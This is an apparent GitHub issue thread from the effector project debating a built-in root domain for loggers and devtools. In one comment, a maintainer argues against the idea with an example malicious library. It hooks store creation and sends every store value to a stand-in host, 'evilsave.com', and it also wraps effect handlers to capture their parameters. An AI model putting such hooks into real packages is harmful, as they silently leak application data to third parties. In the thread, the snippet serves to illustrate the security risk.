### ISSUE TITLE
Built-in root domain support

### ISSUE THREAD

**Issue by AlexandrHoroshih** [effector/effector#675]
## Proposal

Add built-in root domain, just like [`effector-root`](https://github.com/effector/root) does.

```ts
import {root} from from "effector"

root.onCreateStore(store => {
 store.watch(console.log)
})
```

## Use case

Almost any case of monitoring and development tooling requires access to every unit to attach loggers and metric collectors.

But current usage of effector with manually created root domain is problematic, because it must be explicitly imported and it is still possible to use default "domain-less" unit-creators:

```ts
import { myRoot } from "@app/my-root"
import { sample, createEvent } from "effector"

const a = myRoot.createEvent()

// still can create from domain-less creator
// need to manually or semi-automatically (via linters) track this
const b = createEvent() // invisible to domain hooks
```

And usage of `effector-root` is problematic because of the need to setup custom module resolver or macros via babel, which can be challenging for many users.
But it is still more reliable, then manual domain and also needs to be handled only once, so it is basically default choice for anyone, who needs root domain like that - so it would be convenient to have it as a built-in

**Comment by AlexandrHoroshih** [comment]
I remember from previous discussions that there are possible security implications:
```ts
// secret module inside "evil-npm-package"
import { root } from "effector"

root.onCreateStore(stealData)
```
But it looks like that `effector-root` solution suffers from the same kind of problems and, since it is the simplest and most reliable way, it much more likely to be used instead of manual root domain 🤔 

And also it is still possible to get to the every unit without domain - you need to obtain link to just one and then walk by nodes - it requires a bit more knowledge of effector internals, but those are not secret and in case of malicious intent it is not a problem

**Comment by igorkamyshev** [comment]
I think, if we add a built-in root-domain, it should not require explicit unit creation on this domain. So, I assume usage could look like:
```
import {root, createEvent} from 'effector'

const event1 = root.createEvent() // belongs to root-domain
const event2 = createEvent() //belongs to root-domain as well
```

**Comment by sergeysova** [comment]
It is so bad for security and DX.

For example if you write your code and use some library like `lib`, it is available for `lib` to add hooks on root domain and modify any value in the app.

// lib

```js
import { root } from 'effector'

root.onCreateStore(store => {
  store.watch(value => fetch("http://evilsave.com", { body: value }))
})

root.onCreateEffect(fx => {
  const handler = fx.use.getCurrent()
  fx.use((param) => {
    localStorage.set(fx.sid, param)
    return handler
  })
})
```

But for my code it is absolutely implicit:

```js
import { createStore, createEffect } from 'effector'

const $first = createStore(0)
const fx = createEffect((a) => a + window.document.length)
```

Also, root domain in the package absolutely disallows to fully separate different application based on effector on the same page. Be careful about multi-frontends.

**Comment by AlexandrHoroshih** [comment]
Ok, now i better understand possible problems, but still, i think that we need some other way to introduce access to every unit for loggers, devtools and monitors

Most obvious idea:
Requirement to have an explicit domain to create units? 🤔 

```ts
// src/root.ts
import {
 // only one creator function
 createDomain
 // no separate "createEvent", etc
} from "effector"

// root domain of my app
// its private for module and only accesible from here
// unless explicitly provided to other libs
export const myRoot = createDomain()
```
This way we don't have a problem with "domain-less" units in random places + root domain is private to the app
There is a still a problem of separated domains, but it is easier to handle, i think 🤔

**Comment by sergeysova** [comment]
I think we need to improve tools (linters, loggers, devtools and so on) instead of reducing the developer experience

**Comment by AlexandrHoroshih** [comment]
> I think we need to improve tools 

We absolutely do, but looks like having a single common entrypoint in the app (like effector's domain - it can be also some other conception of course) it is a basically requirement to build such tools without flooding production code with debug-related stuff

**Comment by AlexandrHoroshih** [comment]
> Explicit usage of domain methods is problematic as hell and not an option

Got it 👍 

> I suggest to change the solution to "add effector/root module to the library" and note that this will not free you from the burden of transforming the code

But this does not cover issues described by @sergeysova - `effector/root` will still be visible to any other library 🤔 

If we are not considering babel-less solution, then maybe we could add feature of transforming to root to `effector/babel-plugin`?

Something like that:
1. Create special, private for the project, module with root domain
```ts
// src/my-root.ts
export const root = createDomain()
```
2. Specify import path for this root domain at `effector/babel-plugin` options
```ts
// babel-config
plugins: [
 ["effector/babel-plugin", { rootDomainImportPath: "@app/my-root", addLoc: true, addNames: true }]
]
```
3. And then:
```ts
// before plugin
import { createEvent } from "effector"

const myEvent = createEvent()

// after plugin
import { createEvent } from "effector"
import { root } from "@app/my-root"

const myEvent = createEvent({
  domain: root,
  name: "myEvent",
  sid: "r14jb6"
});
```

This way we have:
1. Common root to attach loggers, monitors, etc
2. Which is private to the code of the app
3. Doesn't require end-user to manually setup anything except for babel-plugin, which end-user can't avoid anyway

**Comment by AlexandrHoroshih** [comment]
Domain is a way too powerful abstraction for purposes of monitoring and debugging, because it allows not just watching of every unit, but creating new connections too.

Built-in root domain support would push users to bad design like "reset all stores in the app on userLoggedOut event", which will obviously fail, when there is a store which should not be reset in this case - basically, it is kind of like patching some globals.

API for debugging and monitoring tools should be powerful just enough to cover these use-cases, but not that powerful to describe application's logic - we already have standard units and sample for that.
